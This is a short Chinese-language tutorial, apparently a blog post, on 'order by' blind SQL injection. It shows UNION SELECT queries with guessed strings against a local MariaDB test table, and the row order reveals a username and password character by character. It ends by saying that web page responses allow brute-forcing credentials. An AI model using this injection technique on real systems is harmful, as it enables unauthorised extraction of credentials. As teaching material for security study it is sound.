order by盲注
正常查询,(数据库随便找的)
MariaDB [test]> select * from test1 where username='vampire';+---------------------------+-------------+| username | password |+---------------------------+-------------+| vampire | mypassword || vampire | random_pass |+---------------------------+-------------+2 rows in set (0.001 sec)
order by注入
MariaDB [test]> select * from test1 where username='vampire' union select 1,2 order by 1;+---------------------------+-------------+| username | password |+---------------------------+-------------+| 1 | 2 || vampire | random_pass || vampire | mypassword |+---------------------------+-------------+3 rows in set (0.001 sec)
order by 1的意思就是以第一列为根据排序,用脚本遍历第一列,遍历到w字符时,查询结果如下:
MariaDB [test]> select * from test1 where username='vampire' union select 'w',2 order by 1;+---------------------------+-------------+| username | password |+---------------------------+-------------+| vampire | random_pass || vampire | mypassword || w | 2 |+---------------------------+-------------+3 rows in set (0.001 sec)
可以发现查询结果发生了变化,接着查询第二个字符
MariaDB [test]> select * from test1 where username='vampire' union select 'va',2 order by 1;+---------------------------+-------------+| username | password |+---------------------------+-------------+| va | 2 || vampire | random_pass || vampire | mypassword |+---------------------------+-------------+3 rows in set (0.002 sec)MariaDB [test]> select * from test1 where username='vampire' union select 'vb',2 order by 1;+---------------------------+-------------+| username | password |+---------------------------+-------------+| vampire | random_pass || vampire | mypassword || vb | 2 |+---------------------------+-------------+3 rows in set (0.002 sec)
以此类推,通过网页返回的结果,就可以成功爆破出正确的用户名和密码。
若有收获,就点个赞吧
0 人点赞
